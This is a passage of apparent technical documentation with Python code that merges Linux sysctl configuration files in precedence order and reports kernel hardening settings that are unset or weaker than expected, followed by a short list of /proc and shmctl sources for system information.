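            if fn.endswith(".conf") and fn not in chosen:
                chosen[fn] = os.path.join(directory, fn)
    files = [chosen[fn] for fn in sorted(chosen)]
    if os.path.isfile(sysctl_conf):
        files.append(sysctl_conf)
    return files


def load_sysctl_config(search_dirs=DEFAULT_SEARCH, sysctl_conf="/etc/sysctl.conf"):
    """Effective {key: (value, source_file)} after all files are applied in order."""
    effective = {}
    for path in resolve_config_files(search_dirs, sysctl_conf):
        for key, value, _ignore in parse_sysctl_file(path):
            effective[key] = (value, path)  # later files override earlier ones
    return effective


def hardening_findings(effective):
    """(key, observed, why) for every expected key that is unset or weaker than wanted."""
    findings = []
    for key, (want, why) in EXPECTED.items():
        got = effective.get(key)
        if got is None:
            findings.append((key, "unset (kernel default applies)", why))
        elif got[0] != want:
            findings.append((key, f"{got[0]} in {got[1]}", why))
    return findings


def demo():
    """Constructed layout: a vendor file shadowed by /etc, a local file, and sysctl.conf."""
    with tempfile.TemporaryDirectory() as tmp:
        etc = os.path.join(tmp, "etc/sysctl.d")
        lib = os.path.join(tmp, "usr/lib/sysctl.d")
        os.makedirs(etc)
        os.makedirs(lib)
        with open(os.path.join(lib, "50-default.conf"), "w") as fh:  # vendor defaults
            fh.write("kernel.kptr_restrict = 0\nnet.ipv4.conf.all.accept_redirects = 1\n")
        with open(os.path.join(etc, "50-default.conf"), "w") as fh:  # shadows the vendor file
            fh.write("# hardened\nkernel.kptr_restrict = 2\n-kernel.yama.ptrace_scope = 1\n")
        with open(os.path.join(etc, "99-local.conf"), "w") as fh:
            fh.write("net/ipv4/conf/all/accept_redirects = 0\n")
        conf = os.path.join(tmp, "etc/sysctl.conf")
        with open(conf, "w") as fh:
            fh.write("kernel.dmesg_restrict = 0\n")
        effective = load_sysctl_config([etc, lib], conf)
        return {k: v[0] for k, v in effective.items()}, hardening_findings(effective)
```

The configured value is still only intent: a key set at boot can be changed at runtime, so an agent should pair this with the live value from /proc/sys (the current_value column of the system_controls table above) and report both.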

12. Other information

  • memory_map: parse /proc/iomem
  • mounts: parse /proc/mounts
  • modules: parse /proc/modules
  • memory_info: parse /proc/meminfo
  • shared_memory: enumerate segments with shmctl, using SHM_INFO for the highest index and SHM_STAT on each index up to it
  • uptime: get the boot time via sysctl (kern.boottime on macOS/BSD); on Linux read /proc/uptime

0xFF Reference